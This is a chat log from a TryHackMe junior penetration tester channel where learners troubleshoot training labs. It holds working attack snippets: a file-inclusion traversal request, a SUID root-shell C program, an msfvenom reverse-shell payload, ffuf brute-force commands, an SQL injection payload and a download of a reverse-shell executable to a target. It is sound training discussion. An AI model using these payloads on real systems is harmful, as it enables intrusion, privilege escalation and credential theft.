#junior-pentester-path
1 message · Page 3 of 1
hey @sage current how are you doing tonight?
Maybe there are certain tasks in which browser dev tools won't work, in which you gotta use Burp Suite. There are other ways, but....
Problem is that Burp Suite gets introduced AFTER the Intro to Web Hacking on the Jr Penetration Tester Path, while the File Inclusion room is part of the Intro to Web Hacking.
So you haven't learned the Burp Suite module yet?
Correct
And you also want to follow it in order, right?
I assume that's how you complete the paths. That's how it was for the Pre-Security Pathway and the Intro To Cyber Sec Pathway aaand everything before File Inclusion :p
Damn
Okay, I think you should learn Burp Suite
That's not the point, I wanna know if there is any way to solve it without Burp Suite.
You will learn other ways in the File Inclusion room at the end, maybe?
I see you have completed the File Inclusion room, so you must know the other ways. Right? The challenge you completed at the end of the File Inclusion room
The curl one
That's the end. And no, other ways wouldn't be more sophisticated. There is a way using curl, aka
curl -X POST http://IPHERE/challenges/chall3.php -d 'method=POST&file=../../../../etc/flag3%00' --output -
which works perfectly fine, but I wanna know if there is a way based on what the whole room has been built on (how it was for the other tasks)
Sir, this literally depends on the method you are trying to perform, maybe. If you're still confused, community mentors are there :)
That's why I asked in the first place, my friend. What ways are there besides Burp Suite, with only the knowledge learned up to that room?
No worries sir, looks like I was wrong :)
No worries, that's why I'm waiting for a response from a mentor
@steel nymph sorry to tag, bro needs help
Lassi is a volunteer, please don't ping anyone like that
Mb. Won't do it again. I also wanted to know about the answer, that's why I pinged them
I understand, it's ok. Just for next time
Won't be a reason for a complaint :)
I'm having an issue with Burp Suite task 13. When I access the page normally it loads instantly, but if I go through the Burp Suite browser or FoxyProxy it just loads forever. Any ideas?
Because maybe you have captured the request and you have to forward it. Then the page will load
Great call thank you
Gave +1 Rep to @deft rain
no need to thank buddy π
Gave +1 Rep to @somber raft
Anyone agree with reading the walkthrough to get an idea of the task and then doing it again? Methodologies?
Hi all! I have a question relating to the File Inclusion room. I've managed to get to the challenge section, and I am stuck at the first flag. I understand that I have to change the GET request to a POST request to get the flag. I've tried in the browser tools to "Edit and Resend", but I don't feel like it is working.
I've also tried to open Burp, but as I haven't yet gone through the Burp room I don't know how to use it really, but I also do get an error message when trying to "Open browser" through Burp.
Had the same issue, I believe that's a Firefox issue. For Challenge 1 you can edit the source code from GET to POST for the form
I've opened the web developer tools and used the network tab to catch and look at the requests coming in when I type something in the form in challenge 1.
I then grabbed the GET request with my information, right-clicked and chose "Edit and Resend". Changed the method to POST and clicked "Send". But I don't see anything changing.
Alright, I managed to get the flag by editing the source code. So I guess I made it! I'll have to look into Burp Suite when I get to that room. Thank you
Gave +1 Rep to @steel nymph
Yeah, I do get a weird error message when trying to open the Burp browser, but maybe it is because I haven't set it up correctly
Wow.. that is exactly what I needed someone to tell me xD
Thank you, Burp Suite works for me now
+rep @steel nymph
Gave +1 Rep to @steel nymph
Why did you take orders from Shepherd, you should have stayed with 141..

Soldier, orders are orders. Also wanted to clean up that mess me and Shepherd created while transporting those missiles. So... but don't you know I'm the whole 141 alone?

I think #general would be best for us to talk about this, haha. This channel is dedicated to a pathway
you're right, my bad. Will keep that in mind from now on.
No worries. I'm not a mod, just saving us from getting warned
Hi guys, I got a problem in the Windows Privilege Escalation room... in task six (Abusing dangerous privileges) I couldn't access the target machine... are there any suggestions?
Did you start the new target machine that's attached to task 6?
Of course, but nothing happens
What's the title in the active machine information box?
wprivesc2_v1.1
Can I have the target machine IP and try myself?
10.10.51.236
Seems to work fine, what creds are you using?
I am using the AttackBox and the rdesktop command to access it
Ok, but what credentials are you using to RDP in?
Ok, so what's the error you get?
Since I just tried it and it seems to work fine
Might want to show me a screenshot of the error
the certificate is not valid
I just turned off the AttackBox... wait for me to restart it
I will try it right now
It works fine with Remmina
Thank you both, guys
@steel nymph @shadow echo
Ok, I'm stuck on Authentication Bypass with the brute force. I created the valid_usernames.txt file and populated it. I ran the code, which says it has 0 errors, but I don't see the username/password combination? I've attached a screenshot of my output:
Ok, I couldn't include a screenshot?
Follow the instructions in that link ^
not a problem!
It's not verifying?
Never mind, verified the wrong bot LOL
so back to my question @midnight maple
can you help me?
Screenshot please
one sec
this is the output in my question
Am I reading it wrong @stark turtle (by the way, love the name)
one sec
Thanks again @steel nymph
Gave +1 Rep to @steel nymph
Thanks @stark turtle
one sec
root@ip-10-10-229-174:~/Desktop# cat -A valid_usernames.txt
simon$
steve $
robert$
Ya have a lil space there at steve. I believe that could be it
very likely :d
happens to the best
Gave +1 Rep to @stark turtle
Ayyy, lets go!
I hope to be as good as you two some day!
You don't wanna be as good as me. Trust me
Because then you would be bad
Lol I don't believe it
That task fucked me over too haha dw
I have a question. I'm taking notes on everything. Does it come with repetition and time? I'm trying to remember it all.
You should always take notes. You will adapt what and how you note, but it's always a good idea to keep track of important information
@hazy kraken thanks, I was mistakenly trying to remember it all as I'm going through the Authentication module, you know?
Gave +1 Rep to @hazy kraken
I'm facing a problem in Task 5 Privilege Escalation: Kernel Exploits. First it wasn't letting me download the exploit file ('.c' format) onto the target machine, but I've done it in a different location, /run/user/1001
But now it doesn't let me execute the exploit, even though I've got execute permissions.
Don't do it in that location then? /tmp is usually writable and executable. /run is probably mounted with execute disabled
Ohh, so will it work if I download it to /tmp?
Thank you @idle bison for your help, I got the flag 👍🏻
Gave +1 Rep to @idle bison
/tmp and /dev/shm are common places for doing that sort of thing
Does it apply to every machine?
Linux Privilege Escalation Task 11, I am not able to mount my NFS folder. I use the command "sudo mount -o rw 10.10.24.79:/home/ubuntu/sharedfolder /tmp/sharedfolder". What am I doing wrong?
I'm facing an issue in File Inclusion lab 1. I'm not understanding the instructions on it. Can someone elaborate a bit?
Highlight which bit you don't understand and I'll try to help.
Give Lab #1 a try to read /etc/passwd. What would the request URI be?
I used lab 1 and can read the /etc/passwd file, but I don't get the URL for it?
I get you're using PHP to find an open directory to the file you want, but I'm not understanding the request URL part of it.
Ahh, look at the URL you crafted
That's the request URL
Start after 'http://xx.xx.xxx.xxx/'
thanks
Hey @grave cape, I have a question about file inclusion, can you simplify it a bit?
Sure shoot @modest arch
Well, I'm on lab 3 and I'm backtracking a bit, trying to understand the substitution of the null byte. It's telling me not to trust the user input form, and what I came up with is lab3.php?file=/././././etc/passwd.php
Can I DM you @grave cape? I don't want to "give away" answers to the @tiny bluff stuff in open chat?
Sure go for it
The hint just means enter your payload into the browser search bar instead of the input fields
Oh well, I was trying to solve it without the hint, but thanks! Also, are you a pentester out in the world?
Nope, haha, learning myself
Also, no shame in using the hints, they are there to help
True. I'm torn between pentesting and SOC analyst.
Going pentester myself
I'm not able to get a reverse shell using a cron job for privilege escalation
Modified scripts which are already there, even created the deleted one, but not able to get a reverse shell. Can anyone help?
Okay, I got it now, it needs a little patience.
It is a cron job after all
I always give two passes of the timer before I panic.
In Task 11: NFS Privilege Escalation I got an error
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
-rwsr-sr-x 1 root root 16056 Dec 2 06:25 nfs
permissions on it
and code
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* prototypes for setgid()/setuid() */

int main(void)
{
    setgid(0);            /* binary is SUID/SGID root on the NFS share, so this succeeds */
    setuid(0);
    system("/bin/bash");  /* spawn a root shell */
    return 0;
}
What am I missing?
Got the same issue.
Have you done anything different from this?
Use the static option while compiling
Don't get it, can you elaborate?
Like right now I'm using
gcc nfs.c -o nfs -w
What should I have to change?
Still got the GLIBC error
Thank you for your help I've got the flags and all answers
+rep @shadow echo
Gave +1 Rep to @shadow echo
I've completed the path
Congrats @teal vortex - what's your next move?
When doing the brute-force username enumeration with ffuf, is it possible to pipe out a clean username list?
Going for Offensive Pentesting path
How long did you wait? For me it is taking ages and still nothing....
Evening, fellow pen testers
How could I forget something so basic... Thanks for that!
Gave +1 Rep to @idle bison
If you waited for one minute and still didn't get a shell, then restart the listener and try again; it will give you a shell in a minute or two
I forgot to set it as executable :/ Afterwards it worked as intended
SQL Injection Task 8 - there are 2 columns in the users table - I have found the username column - but I cannot find the 2nd column name for the life of me. I have tried a-z, 0-9 and - [underscore]
It doesn't seem to begin with - or [underscore]. However, I have noticed that the '_' seems to act like a letter substitute, because { column_name like '_s__nam%';--} returns true. Is this normal?
I know what the other column is, I just don't understand why it's not returning true
Yeah, it is normal, nothing wrong in that
What are you trying? Can you share with us?
I managed to pass it last night knowing it was a user table and I was attempting to get credentials... I had a good idea of what the 2 columns were. I believe the string was something along the lines of || admin123' UNION SELECT sleep(1),2 FROM information_schema.columns WHERE table_name = 'sqli_four' AND column_name = 'username' AND column_name LIKE 'pas%';-- ||
This was returning false.
If I have written that correctly I'm very happy with myself, as I have just woken up and not had coffee yet, and managed to recall that from memory hahaha
Okay, noted - would you search for table and column names that are prefixed with an underscore differently in that case?
Which prefix?
Unrelated to the task, just an additional question. I mean when trying to reveal table names in a schema, for example. How would you know that a table does in fact start with an underscore, or whether it's just substituting another letter?
Start with a letter, then underscore or percent, whatever you think is necessary (if you have some idea about the table), then go on
Passive Reconnaissance Room - Task 6 - Q1 needs the answer updating as Shodan now shows Ireland for both:
Not sure what it used to be, but I can't 100% this room
Managed to guess it: || Germany || if anyone else needs to pass the room until it's updated
shows it correctly for me
Q2 asks for the 3rd most common port for Apache. Shodan.io only lists 2 and it's an nginx server.... am I missing something here?
Nvm, questions 1, 2 & 3 want you to search 'Apache' and 'Nginx' on Shodan.io - I misunderstood and thought it was expecting you to get the answers from a search report of tryhackme.com
My Metasploit runs on msf5 while the course uses msf6
When I run it, it says auxiliary failed
Using auxiliary/scanner/netbios/nbname
msf5 auxiliary(scanner/netbios/nbname) > run
[-] Auxiliary failed: Msf::OptionValidateError One or more options failed to validate: RHOSTS
What do i do?
Can you verify yourself and share a screenshot of the options you have set for the exploit?
!docs verify
Not this, the screenshot of the show options command
The show options for the netbios/nbname?
yepp the exploit
You have to set the RHOSTS (remote hosts) value
On what are you trying to use that exploit?
the target machine
But in the learning material they do not set it anywhere..... how do I set it?
Which room is it? Can you share the link for the room?
Task no.?
under scanning
I'm just tryna do what was done there before I get to the exercises
They haven't done anything there with the exploit you're using, firstly
the exploit here and the one you're using are different
I wanna do this. But how do I set the RHOSTS or the port number?
they do
for an exercise
you just said before exercise
Okay, do you have the machine attached to the task started?
yeah
You have the IP address of it?
yes
Okay, set that IP address in the RHOSTS field
howw??
thanks done
@timid compass ⬆️
They spammed it into basically every channel... think it is something weird with it
Am I missing something here? That's clearly the correct URI.
Do you have Burp Suite on?
No
Check if you have an extra space before or after the answer
Hello guys. I have an issue. My AttackBox is pretty slow. I seem to get stuck all day. I would rather prefer to use my local Kali machine. I have tried downloading some files from the AttackBox, but it seems to not go through. I want to ask if there is a way to download files, such as wordlists, from the AttackBox to my Kali?
Which wordlist do you want?
Connect using OpenVPN
Do python3 -m http.server
In the directory with the list
Then wget http://<attackbox ip>:port/list.txt
Hey guys, I'm new to this server. I've been learning Python for a long time, and can I get an idea of something that I can do using Python?
Hey guys
I'm working on the Metasploit lab
msfvenom
I did everything right
but I do not get a Meterpreter
Anyone know what's wrong?
Hi guys, neeeed you here....... in the Windows Privilege Escalation room, in task 6, when I used Impacket this msg popped up
I did a little more digging after a night of sleep and just as I suspected, the answer it accepted is NOT the correct answer for exploiting the LFI.
Not sure if there's a place to report issues like this, so I'll leave this here for anyone else who runs into the same thing.
What is the answer it accepted?
You already have a Meterpreter shell. Look into sessions
Do you have the hives on the machine?
The accepted answer is the absolute file path. The actual exploit needs some ../ in front of it.
It's in the screenshot
Yeah mb I just saw the answer in the screenshot
Haha no worries
There is no issue with the room. Your answer was wrong, maybe
@gentle hull
You entered the wrong value in the form, sir
Well this has been productive
Yes. I entered the wrong value and the platform accepted it as the correct answer. That is what I am saying.
The platform does not accept the actual correct answer
The question is asking you to enter the URI, so the answer is correct
No, you have to traverse directories to access the file. Without the directory traversal, the URI points to nothing because the file doesn't exist in the directory that the PHP file is in
Lab 1 doesn't require traversing, maybe
It does though, that's the whole point. I have to do work now, hope this conversation was helpful for others.
Nope it doesn't
Can you share a screenshot of just /etc/passwd in the form?
How?
Once I click anything it terminates the session
The Meterpreter session? Share a screenshot
I don't know why it doesn't automatically give me a Meterpreter
You pressed Ctrl+C, that's why it closed the session
There ya go
It doesn't require traversal
I didn't
I just typed c there
Can you retry it again and share a screenshot of the results here?
Once I run the script on the victim machine it gives me this
Then does nothing else
Now do as I say
Okay
@elfin geyser
Hello everyone. I'm Solomon.
For some reason, I don't know why my THM virtual machine refuses to start. It all started today. I'm participating in the Advent of Cyber 2022 game
Hello Solomon. What is happening? Can you share some screenshots?
Wait, you already have a shell but not the Meterpreter one
Maybe I'm wrong, can you please share a screenshot without editing?
The screenshot
Which task? In the Meterpreter room?
In the Metasploit: Exploitation room
Okay, task no.?
Did you make an msfvenom payload?
sure
This is on the murphy terminal using SSH
I'm running the scripts I transferred via a Python server
Can you show me the command for making the payload?
yeah
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=1234 -f elf > re_shell.elf
That's the payload
@elfin geyser can you share your screen?
Is there any functionality behind the 'Script Kiddie' output file format for Nmap, or is it kind of an inside joke that went too far?
Feels like it's only there for trolling purposes
I am completely stuck on brute-forcing with ffuf
I'm not sure how to adjust the code to get the output of the username and password
I've tried adjusting W1 with the usernames I found, but it errors out
@ember wave did you end up figuring it out?
Nope, still very stuck
Paste the error you are getting and someone may be able to assist
Which room and task number? I'll take a look if you want another set of eyes
I believe it's Intro to Web Hacking, Authentication Bypass task 4
Finished that section earlier today
Wait, no, that's task 3
If you send me a DM with what you have tried, I will give you some pointers on what you may need to adjust
Thanks for the directions, yes, task 3 - brute-forcing
Gave +1 Rep to @night surge
One thing to check is the path you are using to the wordlist. The path is CaSE SensTIVe, and so will cause it to error out if you have missed some capitalization. It kept getting me for about 15-20 minutes, I was so frustrated - turned out, I had missed the capital L in /SecLists/
Also, for your usernames txt file, make sure your usernames are on a new line each, not a comma/space separated list. E.g.:
your valid_usernames.txt [or whatever you decided to call it] should look like -
name1
name2
name3
And not like -
name1,name2,name3
OR
name1 name2 name3
W1 is being used as a variable and will run on each line of the document you pass it, so if you have them in a comma/space separated list, then what the code will POST to the server would look like:
username=name1,name2,name3
OR
username=name1 name2 name3
Instead of:
username=name1
username=name2
username=name3
obviously replacing my examples 'name1','name2', 'name3' with the usernames found in Task 2
Hydra-related question: is it possible to instruct Hydra to process a list in reverse [Bottom > Top] rather than [Top > Bottom]?
My thinking is it could speed up the process with files like rockyou.txt. This way I could run in 2 separate tabs, one starting the list from the top and the other starting from the bottom - meeting in the middle, this would halve the process time
Why not just reverse the wordlist?
And no, it wouldn't halve the process time any more than just running twice the number of threads, as that's what you're doing.
NetSec Challenge room:
Added the two users to users.txt and set the password list to rockyou.txt with 64 threads running - and the VM almost timed out before it had finished processing - it reckons it has 125 hrs to process the full list
Perhaps you're doing something wrong.
The room review rules for TryHackMe include a 5-minute limit on brute force.
Oh my days - adding the users to a user list was a mistake!!!
Thanks @idle bison for making me re-assess and not sit here like a melon for hours hahaha
Gave +1 Rep to @idle bison
Remember the 5-minute rule
Do you know why using a user list with 2 users takes considerably longer than running them individually?
Well it'll take at least twice as long
Did you set your payload in the handler?
Only if it connects; that doesn't mean you set the correct payload in your multi/handler
Might want to show a screenshot of your options
I do not understand
Show your options for the handler, pls
I already set the LPORT and LHOST
Ye, but you can also set the payload
So show a screenshot please and we can go from there
The payload is reverse_sh.elf
Well, defining the username with '-l name1' and then running again for '-l name2' took about 10 seconds each to run, but running '-l users.txt' was running for well over 30 minutes before I asked my original question in here
You're going to kick yourself
Oh wait
Because it will run the full password list on the first user and then do the second - 5-minute rule!
You were using the literal string "users.txt" as the username
I get you, thank you - seething now
I need to get some flashcards made. The Nmap module just before it was a flag overload, my head's floating with them.
So I edited my word file to look like this
|| I did the code like this: ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=admin,robert,simon,steve&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.56.92/customers/login -fc 200 ||
Still not getting any output with the password
||-d "username=admin,robert,simon,steve&password=W2"|| is where you went wrong
Remember, W1 is acting as a variable, the same as W2 is acting as a variable for your password list
Put your code between | | | | so that it makes it a spoiler tag and doesn't ruin the fun for others not that far
Ok, I'm tracking. So with those acting as variables and reading the file correctly, as it does when I use the original text from the guide, where does the output post to? Because when I leave it alone it reads it without error; how do I get it to output something? I think that's the part my brain is lagging on
It should output a result straight into the terminal, it does not go into a file or anything
This is the output when leaving it alone: || ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.56.92/customers/login -fc 200 ||
So I assumed I had done something wrong
Share your updated code
|| ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.56.92/customers/login -fc 200 ||
Looks correct from memory. I'm in the middle of a room at the minute. Try removing admin from the users list and re-running your code
Smh, nope, still the same output, no username or password shown. This is the weirdest thing, lol, and thank you for the help. I can wait till you're free if you'd like
I'm getting a 502 server error from THM now
Just had a check, and it all looks correct. I even started a machine and ran your code and it worked - try a hard refresh on your page and try your code again
CMD+SHIFT+R [Mac], CTRL+SHIFT+F5 [Win - I think]
I also ran your code with your VM IP and it worked too, so your VM is still up for definite
Huh, odd, ok, I'm refreshing the page now
No luck, did a hard refresh and even terminated the machine and started over
Well, I'll be. Figured it out. I created a new doc with the username info and it worked, smh
Thanks a lot for all the help
No problem
You have to tell multi/handler what type of payload you generated, especially for staged payloads.
You do this with the set command like setting lhost and lport.
Guys, please help. I am currently learning Metasploit. I ran into a problem with the reverse shell generated by msfvenom
Most likely your msfvenom and multi/handler payloads are not matching
ty sir
Gave +1 Rep to @shadow echo
Can you explain further?
Hey, did you fix it? I'm having the same error
My payloads match
Screenshot of what?
Yes, I changed the payload
Hmm, mine does not work
What screenshot do you wanna see?
run show options
Maybe trouble with the port or host
No, it's not that
What did you change it to?
linux/x86/meterpreter/reverse_tcp
Wrong payload
How do I change it?
set payload linux/x86/meterpreter/reverse_tcp
Hi all, new here. I would like some help: I am on task 12 Content Discovery and I'm being asked to target the Acme IT Support page, so I've got onto the AttackBox, tried all these different automation tools (making sure to change the MACHINE_IP to my AttackBox IP). My issue is I can't find this Acme support page that I'm supposedly having to target. Thanks
MACHINE_IP is a variable on the page that switches to the target machine's IP once it's booted. Did you start the target machine as well as the AttackBox?
The target machine will be in the accordion tab with the green icon
The AttackBoxes have limited resources, so they have limited performance. Use a lighter browser if you're ready to see a bit of difference
Nope
Better keep using Safari. Enable hardware acceleration if it has it.
This one has me scratching my noggin':
Metasploit | Exploitation - Task 5
Anyone offer a nudge in the right direction?
How do I know how many days are left on my subscription?
I'll try that, thank you
Gave +1 Rep to @deft rain
You got the hashes or not ?!
Wait, lemme check. I did that room a long time ago
Cheers
You tried looking at the hint?
You got the Meterpreter shell, right?
Yes and yes. I used hashdump on the session and only got an Administrator hash, I think.
It was a few hours ago, I will need to start from the beginning as I had a meeting at work
No worries, ping me if you face it again.
Thanks @deft rain - I'm booting the machines back up now to take another run through
Gave +1 Rep to @deft rain
@deft rain I'm at a loss again - I arrived at the same place and am unsure of what to do next - whether there's another step or I need to go back and try another step instead
My only guess would be || exit the current connection to SMB and try to connect as Administrator using the stolen hash ||
Do you have your machine up rn? I'll fire up my Kali to check it
Yeah
Okay, gimme the IP
Thanks @deft rain, got there in the end. Thank you again for your time and guidance
Gave +1 Rep to @deft rain
No need to thank, mate
Gave +1 Rep to @tame estuary
Metasploit DB Usage Practice | No spoilers - just attempting some additional learning.
I wanted to have a play with msfdb in the AttackBox before I progress further.
$ systemctl start postgresql
Then, when trying $ msfdb init, it insists on running as a non-root user.
Okay, fine
$ su ubuntu
$ msfdb init
This then asks for a user and password for the msf web service. I use root:root as something easy to remember.
It then attempts to start the msf web service - and then errors out.
Does it only behave this way in the AttackBox, or have I fluffed something up? In the task write-up, they run everything as root without errors.
Nvm - I'm a tool sometimes. Looks like it is just AttackBox behavior/limits - I'll go start a Kali box
Metasploit: Meterpreter - Task 5
Possibly another DOH! moment - I have found the secrets.txt and realsecret.txt files, but the task is not accepting the paths as the correct answers
It is asking for the path to the folder said files are in... i.e. excluding the name of the file itself in the answer field
Gave +1 Rep to @sage current
No problem
Metasploit rooms complete - that was.... Emotional.
Thoroughly enjoyed them, but one hell of a roller coaster
Yep, just booting up 'What the Shell?'
Once I have finished the Jr Pentester Path, I am going to redo the Nmap rooms, as that was a lot to take in - and it didn't all go in... at least it doesn't feel like it did. I still don't fully understand all the scan modes
Thank you so much, I knew it'd be something silly. I was finally able to finish the task!
Gave +1 Rep to @tame estuary
Very welcome - I have had quite a few of those moments today, if you look at the conversation in this room
At the end of the 'What the Shell?' room, the last three tasks.
I think this format would work really well in every room. A bunch of extra optional scenarios and two different environments to practice in.
This is what I've been waiting for. 🥳 I like to have a play at the end of a room and explore the new things I've learnt, but being new to the tool/concept taught in the room, I often find myself scratching my head, not knowing enough to give myself my own scenarios..
Are there more rooms that run in this format?
Is there any experienced QA person that can recommend some certification to switch more to cybersec (without losing 50% of your salary)? I was thinking about the CompTIA Pentest certification.
You might be better off asking this in #cyber-and-careers
Does being a QA lead me to a pentester path?
┌──(kali㉿kali)-[~]
└─$ cd Villain
┌──(kali㉿kali)-[~/Villain]
└─$ sudo python3 Villain.py
[Villain ASCII-art banner]
by t3l3machus
[Debug] Core server failed to start. Port 65001 seems to be already in use.
┌──(kali㉿kali)-[~/Villain]
How can I debug this?
65001 is already in use, use a different port
It depends, in my opinion. You can be a QA that can cover all parts of quality control, including security. Or as QA you can at least get very strong fundamentals of backend, networking, DBs etc. (depends on what your role / scope / company / project etc. is)
Thanks for the response @modest arch, I'm a fresh grad and I want to start a career in cybersecurity, specifically in the field of pentesting, but it seems companies are mostly hiring only with experience. That's why I asked for a lower-tier role to get into that position. Currently I'm learning online materials and studying
Gave +1 Rep to @glacial panther
┌──(kali㉿kali)-[~/Villain]
└─$ sudo python3 Villain.py
Traceback (most recent call last):
File "/home/kali/Villain/Villain.py", line 11, in <module>
from Core.common import *
File "/home/kali/Villain/Core/common.py", line 12, in <module>
from Crypto.Cipher import AES
ModuleNotFoundError: No module named 'Crypto'
┌──(kali㉿kali)-[~/Villain]
└─$
I am getting some error?
@gaunt bolt is this related to content on this tryhackme learning path?
I don't know where to ask & am new to cybersec
#infosec-general please
@idle bison tq
I'm doing a little deeper dive into Nmap before I finish off the Jr Pentester Path - I am referencing nmap.org here [ https://nmap.org/book/host-discovery-dns.html ]
Is it a common/standard practice IRL to utilise Nmap's [ --dns-servers ] to speed up scan times and offer a little extra stealth? And also, how much stealth and time savings does this generally offer? (I know it's not really quantitative, just curious as to whether it's worth the extra effort)
It's not really more stealthy unless you're asking their DNS servers directly
It's faster because of parallelism, I've done it like once when I had a big list and I was trying to do just mass name resolution
Okay, so more of a performance enhancer. Can you pass [ --dns-servers ] an authoritative_servers.txt list as an argument?
Doesn't look like it.
no problem, thanks @idle bison
Got myself a fresh notebook to sit and write all my notes down, it's genuinely helping. Just the handwriting that needs some work now :p
Gave +1 Rep to @idle bison
Hi need help with windows privilege escalation, the payload has been sent over to the windows machine and I cannot find it on the system, the AV is off by default
It must be in the dir where you ran the command to get it
I had a look in the folders and the move command is not finding it in any dir
download it again in a known dir I think some dirs won't have perms for it
ok will attempt it tonight and try that
Hi Graves still having the same issue, tried writing to %temp% directory with the same issue
Linux Escalation | Task 7 - running task 7 machine
Karen has no sudo privileges at all - how do i progress. It's impossible to follow along with the task as the permissions don't allow you
nvm worked it out
Okay do one thing. With which user you got foothold inside the Windows machine ??
Go to C:\Users\thm-unpriv and there try downloading the malware from your attacking machine
I have already gained access to svcuser1 and I have stated that I have tried the usual directory C:\Users\thm-unpriv . I also tried the C drive as well as the temp directory in App Data
I am using the attack box it displays that it has been transferred with 200 status what more can I do as I viewed each folder in the directory
Are you using curl ??
If yes then you have to use -o [output filename] in the command too
no I used the Simple httpserver with python module and on the victim pc used wget to transfer the file on to the pc
with powershell opened
can you verify yourself and share a screenshot ??
!docs verify
The error says it can't find the rev-svc2.exe there
Enter dir command to list files of that dir
I have looked everywhere on the directory
Nope. Use this command to get the file
curl http://ip:port/file -o rev-svc2.exe
ok works better with curl, thanks
should have just started with that curl command when you mentioned it, thanks again Graves
powershell wget is not wget. its just an alias for invoke-webrequest, the same as curl in powershell. You would need to -O filename for it to work
thank you
i think you can do [ Get-Alias -name "wget" ] & [ Get-Alias -name "curl" ] in powershell to confirm this
Hey! currently on Introduction to web hacking: Subdomain enumeration, on the last exercise of it "Virtual Hosts" the size I need doesn't come up when I follow all the steps in the attack box, so I've watched some video's and that way got the answer, I still want to do it myself but I have noticed that every single video I watched the person was using Kali Linux so I was wondering if I could just follow the entire course on Kali Linux using VMware
You can use kali linux as an attackbox just click on the arrow right side to the "Start Attackbox" button. And select kali linux from there
Also it doesn't matter. Kali won't give you answers that attackbox(ubuntu) didn't give
hey i wanna ask was the windows privilege escalation course rebranded recently?
why ??
rebranded???? no
remade??? yes it was polished up a bit with QA and made better by explaining all the methods more in depth and adding a few new ones
Okay thank you
Gave +1 Rep to @sage current
I noticed some differences since i did it last
Ohh okay
Afternoon! Need some assistance. Working on Linux Priv Escalation Task 9. I've identified the cronjob and injected my reverse shell into the file on the target system and started a NC listener on my attack box. However, I'm not getting any callbacks on my own attackbox or the THM attackbox. I've tried changing the port numbers in the inserted code/NC listener as well as terminating the target system and restarting it. Watched a few walkthroughs and I'm doing exactly what they're doing and still no callbacks. Any ideas??
Did you check the file permissions of the file that's holding your rev shell now ?
I love you. I didn't and I see exactly why it hasn't been running.
Welp here I am again -- Working on Linux Priv Escalation Task 11. I have my attack directory mounted to the target no_root_squash directory, created my binary, compiled my binary, set the SUID, and it runs on the target machine. However, the code provided in the lesson isn't escalating to root. I tested a dummy file (just prints "Hello, World!") and it runs just fine on the target box. I've even copied code used in a walkthrough (which is similar but different to the lesson provided code) and still nada. Any ideas??
Fixed -- I overlooked what user my binary was owned by when I created it.
Hello guys on Task 5 of Linux PrivEsc i can't wget the payload from my own kali attackbox on /Downloads/37292.c
any ideas to help please
when i do wget on target machine my attackbox responses with 404 file not found
Start the python server in the same directory as your file is
Then just use /37292.c
Thanks alot worked
Hey guys how can we specify a port with enum4linux, the ssh port is 2222 and I think enum4linux scan the 22 ( Basic pen testing)
enum4linux is for SMB/RPC, not SSH
Thank you for the answer, you know any tool for ssh enumeration ?
Gave +1 Rep to @idle bison
No.
I can tell you for a fact that enumerating SSH is barking up the wrong tree so to speak.
what will be best path to pentester career ? (junior pt-->offensive pt---> web fundamentals ? )
I'm starting to feel a real bond with the folks at ACME IT Support! Almost feeling sad for them and their super insecure website
they have a website like we all would have coded it 10-15 years ago
Long long time ago I created a quiz website in php and I shared the url online. Few days after, someone used an SQL injection to put themselves at the top score
ty alot
Gave +1 Rep to @sage current
heyy, I'm having some trouble with the burp suite basics room, on task 14
instead of getting the alert I get this 'invalid parameters' thing and I don't really know what I could be doing wrong :/
did you use ctrl+u to decode?
yes
well it just suddenly worked now... and the attack machine just stopped working immediately after haha
but I also did that, this was my millionth try
guess it was just a buggy thing?
thank you either way
i have to say it, then it works xD
i was showing the issue to my fiance after your answer and suddenly it worked hahaha i think the universe is just against me
right now? - yes
cant seem to wget on linux privescalation room
im not to sure whats happening but i just keep getting 404 file not found
Hi, I'm trying to rdp into a tryhackme windows machine from my own kali linux (not attackbox). I've tried rdesktop to the IP but receive error. How do I do this?
Can you share a screenshot ??
Start your webserver in the directory where file the file is stored, that you are downloading
is nc not installed on the what the shell windows pc? I keep getting a 'nc' is not recognized error.
Navigate to C:/tools directory. You'll find netcat there
ok
Hi People! a pretty general question: On a Linux machine, i am logged in as a pretty low privileged user... I can barely write (create a file in a directory) or look in a file (but i could traverse through almost all directories). But after i traversed a lot of directories and tried, i finally found a directory in which i could create a file (it was /tmp). But is there any other method i can use to see if i can write in a certain directory without trying it all the time? I could think about the approach with 'ls -l' but im not pretty sure
ls -la then it will include . and ..
Alright. Thx. But the approach with ls -l (and -al as you kindly suggested) is in the right direction i guess?
That's one way
I'd make use of find personally, if the usual /tmp and /dev/shm aren't available
So you would then "find" for directories with certain permissions?
Yes, the find command can do that.
Guys yesterday I completed the Linux priv esc room but I have a question
I did the capstone challenge, I wasn't able to read /etc/shadow neither root user wasn't able, but with suid set on base64 I did my tasks , can u explain why?
Hi I just finished the Vulnerability Capstone and managed to run both exploits. However, I'm wondering without the hints, which part of the exploit code implies that we need to setup a reverse shell listener? I wanted to have a better understanding of the python code and checked out the author's README on Github but it seems he didn't need a reverse shell (https://github.com/padsalatushal/CVE-2018-16763)
Help me pls
Read the explanation of Task 7 again
So ??
So if the root user cannot read the file
share a screenshot of whoami command here
You should be able to read the shadow file if you're root
Yes bro that's correct
But when I checked the permission file.. root user cannot read it
I'll send the screenshot ..
I don't think so it is instructed to read the shadow file in the task. We just have to find flags and submit
i'm doing the net sec challenge, and the nmap scan is taking a while to complete. is it a bad idea to do the password bruteforce at the same time? looking at the system monitor on the attackbox it seems there's plenty of cpu overhead, and network traffic is about 1Mb/s
Press enter and see the status
hey guys anyone here for help maybe ?
Please state your question
so im in the Walking an Application room at task 3 https://tryhackme.com/room/walkinganapplication#
and i dont understand about which directory he talk about
he talking about the source code but i dont understand what is the directory
A directory is a location that stores files
yeah i know but how do i see the directory he talks about
its in the source code i guess
but i dont understand
